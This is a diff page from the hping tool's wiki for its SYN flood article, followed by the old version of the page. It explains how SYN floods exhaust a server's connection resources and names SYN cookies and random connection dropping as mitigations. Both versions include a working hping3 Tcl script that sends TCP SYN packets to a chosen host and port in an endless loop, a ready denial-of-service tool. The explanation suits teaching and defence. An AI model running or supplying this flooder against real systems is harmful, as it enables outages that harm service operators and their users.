Differences for page SYN flood -- hping network security tool

hping wiki

Differences for page SYN flood

Current version compared with version Tue Nov 23 03:41:49 GMT 2004

...
- The SYN flood is an attack that can nowadays be defined as archaic, although the general idea can still work (in a DDoS, for instance).
+ !!The SYN flood is an attack that can nowadays be defined as archaic, although the general idea can still work (in a DDoS, for instance).
  
+ 
  The goal of this attack is to send TCP connection requests faster than a machine can process them 
  in order to saturate the resources and prevent the machine from accepting any more connections.
  Actually the attacker does not create a whole TCP connection, but just send a SYN packet
...
  but still the attack can create some problem. A simpler way to face it, that is somewhat effective and
  yet very simple, is to drop a connection at random if there are too many open connections.
  
- This wiki is nothing without code, so here we go (attached as .htcl file)
+ ----
  
-  # (c) GPL2 fluxist@gmail.com
+ 
+ This wiki is nothing without code, so here we go (as .htcl file).....
+ 
+  # (c) GPL2 fluxist(at)gmail.com
   # Usage; hping3 exec ./synflood.htcl <hostname> <dstport>
  
-  if {$argc < 1} {
-    puts "required arguments; hostname dstport"
+  if {$argc < 2} {
+    puts "Required arguments: hostname dstport"
     exit 1
     }
  
...

The following is the old page content

The SYN flood is an attack that can nowadays be defined as archaic, although the general idea can still work (in a DDoS, for instance).

The goal of this attack is to send TCP connection requests faster than a machine can process them 
in order to saturate the resources and prevent the machine from accepting any more connections.
Actually the attacker does not create a whole TCP connection, but just send a SYN packet
(the first packet required to start a TCP connetion), spoofing at random the source IP address,
so from the attacker point of view the resource to perform the attack is only the bandwidth
because there is no state to take. Modern operating systems are able to handle resources better
than in the past, or to use cryptographic techniques (like [Syn cookies] or [RST cookies]) to mitigate
the problem (and allocate memory only after the third packet of a new TCP connection reached the host),
but still the attack can create some problem. A simpler way to face it, that is somewhat effective and
yet very simple, is to drop a connection at random if there are too many open connections.

This wiki is nothing without code, so here we go (attached as .htcl file)

# (c) GPL2 fluxist@gmail.com
 # Usage; hping3 exec ./synflood.htcl <hostname> <dstport>

if {$argc < 1} {
   puts "required arguments; hostname dstport"
   exit 1
   }

foreach {hostname port} $argv break
 set srcport 14000
 set target [hping resolve $hostname]
 set myaddr [hping outifa $target]

puts "Synflooding $target..."

while {1} {
   hping send "ip(saddr=$myaddr,daddr=$target)+tcp(sport=$srcport,dport=$port,flags=s)"
   }